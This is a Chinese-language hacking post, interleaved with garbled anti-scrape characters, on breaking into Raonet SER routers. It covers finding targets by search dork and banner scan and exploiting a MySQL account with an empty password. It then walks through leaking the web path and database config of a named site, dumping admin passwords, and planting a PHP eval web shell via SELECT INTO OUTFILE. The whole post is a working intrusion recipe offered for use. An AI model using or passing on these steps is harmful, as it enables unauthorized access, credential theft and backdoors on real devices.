寻找存在漏洞的路由器方法:# {" C; l( A7 t* x; O! M
2 e. o, ? b, b0 ^4 Y+ P" h1:google搜索'Raonet Subscriber Ethernet Router'7 }4 S2 |% Q: @- ~+ L" H( m- b0 d
$ z, {% R$ g. K( B2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
9 M6 \/ g; T+ t2 v0 q: `' _! g) d0 [) \! G5 t
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
A! {& S. e7 A2 `. S' k2 C' M4 E6 b+ F3 s( y( V" q E$ D+ ^4 p1 r# r
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......+ y( Q2 S+ x2 ~/ k! T& ~* }" V$ y
, w& M A3 C; K5 v5 L5 x& ]2 M ; r) i: |, @/ e/ b, c8 r* H; E
% o K: r# B& U/ A1 R
入侵步骤:
, s4 X* }+ G+ V9 E
5 _ ^% f4 X1 ?$ W1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php0 _3 e+ D2 |: `! Q* C a, J/ X
" h% h; } J6 n9 d1 f, L2 j5 i2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
* q7 ~# x9 S' t+ y d. |3:得到密码后连接,查看GUI管理密码:% C v; g \) q* c8 C) F0 X1 B1 j
use ser_500
& i. ?0 d, k0 ~% u/ W- Rselect id,passwd from user;
; C( L& y0 z# L4:通过数据库写入webshell,执行命令:
: S6 {+ x: @$ y! nuse mysql;5 o# c% ]1 O S7 f
create table ok(cmd TEXT);* u) ]/ s" b2 ^: {# M& f% o
insert into ok values("<?php @eval($_POST[cmd])?>");
6 b2 F8 r9 |8 J) }select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
~% K$ H# J9 W1 M, adrop table ok;
( [. o7 V' ` Z K( o5 A; B
D$ d) r* X8 X5 A7 U: p$ E: {5:连接后门shell.php ; e: |# q8 p& W* Z$ _5 c
( W2 Z1 H3 _5 U$ ]) Q
6. 搞定!, ?( F+ C& l$ a" C7 m
& R# Z- Y6 h( v; t5 l# a8 _/ ^ |